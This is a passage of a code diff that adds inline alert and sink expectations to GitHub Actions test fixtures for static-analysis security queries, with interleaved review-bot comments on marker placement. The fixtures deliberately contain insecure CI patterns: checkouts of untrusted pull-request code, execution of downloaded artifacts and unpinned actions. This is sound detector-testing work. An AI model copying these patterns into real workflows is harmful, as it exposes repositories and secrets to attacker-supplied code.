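Review bot: In Test 8 the marker is appended to the last content line of a folded block scalar (`if: >` … `3 == 4 }} # $ Alert[actions/if-expression-always-true/high]`), and inside a block scalar `#` does not start a YAML comment, so the marker text becomes part of the `if` value. The same holds for Tests 16, 17 and 21 in the `@@ -79,27` hunk (`|+`, `>+`, `>`) and for the matching steps in test2.yml; the `Sink` markers inside `run: |` scripts in the CWE-829 fixtures are scalar content too, though there the shell treats them as comments. These cases presumably exist to cover how folding and chomping leave text outside `${{ }}`, and with the marker appended they may now be flagged for the added text instead. A comment is legal on the indicator line, e.g. `if: > # $ Alert[actions/if-expression-always-true/high]`, if the expectation can be matched there; otherwise I would keep inline markers off these steps and check that the alert still fires on the unmodified scalar.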
@@ -53,10 +53,10 @@ jobs: if: "${{1 == 2 }}" run: echo "Test 10 should not be printed" - name: Test 11 - if: " ${{ 1 == 2 }}" + if: " ${{ 1 == 2 }}" # $ Alert[actions/if-expression-always-true/high] run: echo "Test 11 should not be printed" - name: Test 12 - if: " ${{ 1 == 2 }}" + if: " ${{ 1 == 2 }}" # $ Alert[actions/if-expression-always-true/high] run: echo "Test 12 should not be printed" - name: Test 13 if: | @@ -79,27 +79,27 @@ jobs: if: |+ ${{( false || 1 == 2 - )}} + )}} # $ Alert[actions/if-expression-always-true/high] run: echo "Test 16 should not be printed" - name: Test 17 if: >+ ${{( false || 1 == 2 - )}} + )}} # $ Alert[actions/if-expression-always-true/high] run: echo "Test 17 should not be printed" - name: Test 18 - if: ${{ github.event_name }} == 'foo' + if: ${{ github.event_name }} == 'foo' # $ Alert[actions/if-expression-always-true/high] run: echo "Test 18 should not be printed" - name: Test 19 - if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.foo )}} || github.event_name == 'foo' + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.foo )}} || github.event_name == 'foo' # $ Alert[actions/if-expression-always-true/high] run: echo "Test 19 should not be printed" - name: Test 20 - if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" + if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" # $ Alert[actions/if-expression-always-true/high] run: echo "Test 20 should not be printed" - name: Test 21 if: > ${{ github.event.workflow_run.event == 'pull_request' && - github.event.workflow_run.conclusion == 'success' }} + github.event.workflow_run.conclusion == 'success' }} # $ Alert[actions/if-expression-always-true/high] run: echo "Test 21 should not be printed" - name: Test 22 if: | diff --git a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml index 8b863037e29b..10688938a010 100644 
--- a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml +++ b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml @@ -16,7 +16,7 @@ jobs: ${{ github.actor == "foo" || 3 == 4 - }} + }} # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 2 should not be printed" - name: Test 3 if: ${{ github.actor == "foo" }} @@ -31,7 +31,7 @@ jobs: }} run: echo "Test 5 should not be printed" - name: Test 6 - if: ${{ 1 == 1 }} ${{ github.actor == "foo" }} + if: ${{ 1 == 1 }} ${{ github.actor == "foo" }} # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 6 should not be printed" - name: Test 7 run: echo "Test 7 should not be printed" @@ -45,7 +45,7 @@ jobs: if: > ${{ github.actor == "foo" || - 3 == 4 }} + 3 == 4 }} # $ Alert[actions/if-expression-always-true/critical] - name: Test 9 if: '${{ github.actor == "foo" }}' run: echo "Test 9 should not be printed" @@ -53,10 +53,10 @@ jobs: if: "${{ github.actor == 111 }}" run: echo "Test 10 should not be printed" - name: Test 11 - if: " ${{ github.actor == 111 }}" + if: " ${{ github.actor == 111 }}" # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 11 should not be printed" - name: Test 12 - if: " ${{ github.actor == 111 }}" + if: " ${{ github.actor == 111 }}" # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 12 should not be printed" - name: Test 13 if: | 
@@ -79,27 +79,27 @@ jobs: if: |+ ${{( false || github.actor == "foo" - )}} + )}} # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 16 should not be printed" - name: Test 17 if: >+ ${{( false || github.actor == "foo" - )}} + )}} # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 17 should not be printed" - name: Test 18 - if: ${{ github.actor }} == 'foo' + if: ${{ github.actor }} == 'foo' # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 18 should not be printed" - name: Test 19 - if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 19 should not be printed" - name: Test 20 - if: ${{ github.actor }} != "" + if: ${{ github.actor }} != "" # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 20 should not be printed" - name: Test 21 if: > ${{ github.actor == 'foo' && - github.event.workflow_run.conclusion == 'success' }} + github.event.workflow_run.conclusion == 'success' }} # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 21 should not be printed" - name: Test 22 if: | diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref index 823f802a70f2..0c665471cafc 100644 --- a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref @@ -1 +1,2 @@ -Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql +query: Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref index f12135bd1b88..546bb9dd0c9a 100644 --- a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref +++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref @@ -1 +1,2 @@ -Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql +query: Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml index cd4f0fe660aa..47151cec6dea 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml @@ -8,6 +8,6 @@ runs: with: ref: ${{ github.event.pull_request.head.sha }} fetch-depth: 2 - - run: echo "foo" + - run: echo "foo" # $ Alert[actions/untrusted-checkout/critical] shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml index 4241647d3e11..ad2a67b14bb3 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml @@ -22,7 +22,7 @@ runs: }); let fs = require('fs'); fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); - - run: | + - run: | # $ Alert[actions/artifact-poisoning/critical] Alert[actions/unversioned-immutable-action] mkdir -p /tmp/artifacts unzip /tmp/artifacts.zip shell: bash 
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml index 0c2059521020..ac4364695ee4 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml @@ -22,7 +22,7 @@ runs: }); let fs = require('fs'); fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); - - run: | + - run: | # $ Alert[actions/unversioned-immutable-action] mkdir -p /tmp/artifacts unzip /tmp/artifacts.zip -d /tmp/artifacts shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml index 782505cc698d..db50d733137b 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml @@ -2,5 +2,5 @@ name: Composite unpinned tag test runs: using: "composite" steps: - - uses: foo/bar@v2 + - uses: foo/bar@v2 # $ Alert[actions/unpinned-tag] - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml index 08a25646d6ae..369412a9c4d1 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml 
@@ -16,11 +16,11 @@ jobs: npm install npm build - - uses: completely/fakeaction@v2 + - uses: completely/fakeaction@v2 # $ Alert[actions/unpinned-tag] with: arg1: ${{ secrets.supersecret }} - - uses: fakerepo/comment-on-pr@v1 + - uses: fakerepo/comment-on-pr@v1 # $ Alert[actions/unpinned-tag] with: message: | Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml index 7eaee9fa6d38..42322833ce72 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml @@ -8,12 +8,12 @@ jobs: runs-on: ubuntu-latest steps: - name: download pr artifact - uses: dawidd6/action-download-artifact@v2 + uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] with: workflow: ${{github.event.workflow_run.workflow_id}} run_id: ${{github.event.workflow_run.id}} name: artifact - - id: pr_number + - id: pr_number # $ Alert[actions/artifact-poisoning/critical] run: | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt) - echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml index f8d3736dba51..44e8a18d733f 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml 
@@ -29,13 +29,13 @@ jobs: }); let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data)); - - name: Unzip + - name: Unzip # $ Alert[actions/artifact-poisoning/critical] run: | unzip sonarcloud-data.zip -d sonarcloud-data ls -a sonarcloud-data - name: Run command run: - ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build + ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml index aa884b7eca74..953d06f55c71 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml @@ -29,12 +29,12 @@ jobs: }); let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data)); - - name: Unzip + - name: Unzip # $ Alert[actions/artifact-poisoning/critical] run: | unzip sonarcloud-data.zip ls -a sonarcloud-data - name: Run command run: - python foo/x.py + python foo/x.py # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml index e73548895d37..81f42aa335b7 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml 
@@ -10,14 +10,14 @@ jobs: Download: runs-on: ubuntu-latest steps: - - uses: dawidd6/action-download-artifact@v2 + - uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] with: name: artifact_name workflow: wf.yml path: foo - - name: Run command + - name: Run command # $ Alert[actions/artifact-poisoning/critical] run: | - sh foo/cmd + sh foo/cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml index ac970fff8404..ca69571fab22 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml @@ -10,12 +10,12 @@ jobs: Download: runs-on: ubuntu-latest steps: - - uses: dawidd6/action-download-artifact@v2 + - uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] with: name: artifact_name workflow: wf.yml - - name: Run command - run: sh cmd + - name: Run command # $ Alert[actions/artifact-poisoning/critical] + run: sh cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml index 0e7c6f97cf5d..d08b18147fe8 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml 
@@ -12,11 +12,11 @@ jobs: steps: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - - name: Unzip + - name: Unzip # $ Alert[actions/artifact-poisoning/critical] run: | unzip artifact_name.zip -d foo - name: Run command - run: ./foo/cmd + run: ./foo/cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml index 7a837ee42d2c..a573db866bda 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml @@ -13,9 +13,9 @@ jobs: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo unzip artifact_name.zip -d bar - - name: Run command + - name: Run command # $ Alert[actions/artifact-poisoning/critical] run: | - ./bar/cmd + ./bar/cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml index 39ec063c7b64..b40091d7808f 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml @@ -13,9 +13,9 @@ jobs: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo unzip foo/artifact_name.zip - - name: Run command + - name: Run command # $ Alert[actions/artifact-poisoning/critical] run: | - ./bar/cmd + ./bar/cmd # $ Sink[actions/artifact-poisoning/critical] 
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml index 905a4eaccb17..b4319fd42f99 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml @@ -13,13 +13,13 @@ jobs: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo unzip foo/artifact_name.zip - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/artifact-poisoning/critical] uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install - npm run lint + npm run lint # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml index afa3e15132e3..645fe636d3e6 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml @@ -18,8 +18,8 @@ jobs: gh api $url > "$name.zip" unzip -d "foo" "$name.zip" done - - name: Run command - run: ./foo/cmd + - name: Run command # $ Alert[actions/artifact-poisoning/critical] + run: ./foo/cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml index d3100d46edc7..24fef012e0e3 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml 
@@ -18,8 +18,8 @@ jobs: gh api $url > "$name.zip" unzip "$name.zip" done - - name: Run command - run: ./cmd + - name: Run command # $ Alert[actions/artifact-poisoning/critical] + run: ./cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml index 8cb380ae0436..4430b91fba94 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml @@ -7,12 +7,12 @@ jobs: runs-on: ubuntu-latest steps: - name: download pr artifact - uses: dawidd6/action-download-artifact@v2 + uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] with: workflow: ${{github.event.workflow_run.workflow_id}} run_id: ${{github.event.workflow_run.id}} name: artifact - - name: Use artifact + - name: Use artifact # $ Alert[actions/artifact-poisoning/critical] run: | - sed -f config foo.md > bar.md + sed -f config foo.md > bar.md # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml index 399adf3dff77..5a6bf1d62254 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml @@ -11,7 +11,7 @@ jobs: - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - run: | + - run: | # $ Alert[actions/untrusted-checkout/medium] bash script.sh - uses: actions/upload-artifact@v4 with: 
@@ -28,4 +28,4 @@ jobs: - uses: actions/download-artifact@v4.0.0 with: name: results - - run: python test.py + - run: python test.py # $ Alert[actions/artifact-poisoning/critical] Alert[actions/artifact-poisoning/path-traversal] Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml index af9f01b572f1..184661fda499 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml @@ -15,7 +15,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 - - uses: ./.github/actions/download-artifact + - uses: ./.github/actions/download-artifact # $ Alert[actions/unversioned-immutable-action] - id: metadata run: | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" @@ -25,5 +25,5 @@ jobs: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 with: ref: ${{ env.PR_COMMIT }} - - uses: ./.github/actions/install-deps + - uses: ./.github/actions/install-deps # $ Alert[actions/unversioned-immutable-action] - run: make snapshot diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml index e35bc73c3bda..806b99204678 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml 
@@ -15,7 +15,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 - - uses: ./.github/actions/download-artifact-2 + - uses: ./.github/actions/download-artifact-2 # $ Alert[actions/unversioned-immutable-action] - id: metadata run: | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" @@ -25,5 +25,5 @@ jobs: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 with: ref: ${{ env.PR_COMMIT }} - - uses: ./.github/actions/install-deps - - run: make snapshot + - uses: ./.github/actions/install-deps # $ Alert[actions/unversioned-immutable-action] + - run: make snapshot # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml index f970a3fa1979..6498802afc9c 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml @@ -15,4 +15,4 @@ jobs: with: github-token: ${{ secrets.GITHUB_TOKEN }} run-id: ${{ github.event.workflow_run.id }} - - run: npm install \ No newline at end of file + - run: npm install # $ Alert[actions/artifact-poisoning/critical] Sink[actions/artifact-poisoning/critical] \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml index 28ffab637f03..7093027c4d91 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml 
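Review bot: artifactpoisoning96.yml still ends without a trailing newline on the new side (`\ No newline at end of file` follows the rewritten `- run: npm install` line). Since that last line is being rewritten anyway to carry `Alert[actions/artifact-poisoning/critical] Sink[actions/artifact-poisoning/critical]`, terminate it with a newline in the same change. Otherwise the next step appended to this fixture will show the annotated line as modified again and obscure whether the expectation itself changed.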
@@ -24,7 +24,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Set up Python ${{ env.min-python-version }} + - name: Set up Python ${{ env.min-python-version }} # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-python@v2 with: python-version: ${{ env.min-python-version }} @@ -34,7 +34,7 @@ jobs: python -m pip install --upgrade pip pip install -r requirements.txt - - name: Lint with flake8 + - name: Lint with flake8 # $ Sink[actions/untrusted-checkout/critical] run: flake8 - name: Check black formatting @@ -49,7 +49,7 @@ jobs: run: mypy if: success() || failure() - test: + test: # $ Sink[actions/untrusted-checkout/critical] permissions: # Gives the action the necessary permissions for publishing new # comments in pull requests. @@ -71,7 +71,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref || github.event.pull_request.base.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Set up Python ${{ matrix.python-version }} + - name: Set up Python ${{ matrix.python-version }} # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-python@v2 with: python-version: ${{ matrix.python-version }} @@ -81,7 +81,7 @@ jobs: python -m pip install --upgrade pip pip install -r requirements.txt - - name: Run unittest tests with coverage + - name: Run unittest tests with coverage # $ Sink[actions/untrusted-checkout/critical] run: | pytest -n auto --cov=autogpt --cov-report term-missing --cov-branch --cov-report xml --cov-report term env: @@ -90,8 +90,8 @@ jobs: AGENT_MODE: ${{ vars.AGENT_MODE }} AGENT_TYPE: ${{ vars.AGENT_TYPE }} - - name: Upload coverage reports to Codecov - uses: codecov/codecov-action@v3 + - name: Upload coverage reports to Codecov # $ Sink[actions/untrusted-checkout/critical] + uses: codecov/codecov-action@v3 # $ Alert[actions/unpinned-tag] - name: Stage new files and commit id: stage_files 
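Review bot: The `Sink[actions/untrusted-checkout/critical]` marker on the `test:` job key in auto_ci.yml is attached to a line that executes nothing, so the fixture no longer shows which step is the sink. It appears to refer to the final step of the preceding job, though the hunk alone does not confirm that. The same displacement shows on `toppings:` in level0.yml, `mantis-e2e:` in pr-workflow.yml, `deploy:` and `preview: 'true'` in poc.yml, and the blank line replaced by a bare marker in reusable.yml. If the reported location cannot be moved onto the step itself, a YAML comment on the line above each of these would keep the fixtures readable, e.g. `# marker below refers to the last step of the previous job`.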
@@ -108,7 +108,7 @@ jobs: - name: Create PR id: create_pr if: ${{ env.TIMESTAMP_COMMIT != null }} - uses: peter-evans/create-pull-request@v5 + uses: peter-evans/create-pull-request@v5 # $ Alert[actions/unpinned-tag] with: commit-message: Update cassettes branch: cassette-diff-PR-${{ github.event.pull_request.number }}-${{ env.TIMESTAMP_COMMIT }} @@ -124,7 +124,7 @@ jobs: - name: Comment PR URL in the current PR if: ${{ env.TIMESTAMP_COMMIT != null }} - uses: thollander/actions-comment-pull-request@v2 + uses: thollander/actions-comment-pull-request@v2 # $ Alert[actions/unpinned-tag] with: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} message: | diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml index 072eae4b1d2a..a905b6b9d668 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml @@ -35,7 +35,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} token: ${{ secrets.DEPENDABOT_AUTOBUILD }} - - name: Read .nvmrc + - name: Read .nvmrc # $ Alert[actions/untrusted-checkout/medium] id: nvm run: echo "NVMRC=$(cat .nvmrc)" >> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml index 1bda517c9a12..308cc9fde518 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml @@ -17,7 +17,7 @@ jobs: show-progress: false ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-java@v4 + - uses: actions/setup-java@v4 # $ Alert[actions/untrusted-checkout/critical] with: distribution: temurin java-version: 17 
@@ -45,7 +45,7 @@ jobs: env: GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Merge Dependabot pull request + - name: Merge Dependabot pull request # $ Sink[actions/untrusted-checkout/critical] if: steps.set-milestone.outputs.mergeEnabled run: gh pr merge ${{ github.event.pull_request.number }} --auto --rebase env: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml index 3b8a6d6dd62a..b338fbc5f16b 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml @@ -23,7 +23,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ inputs.branch }} - - run: | + - run: | # $ Alert[actions/untrusted-checkout/critical] npm install npm run lint - + # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml index ab121239c6e1..f34f96996c50 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml @@ -15,9 +15,9 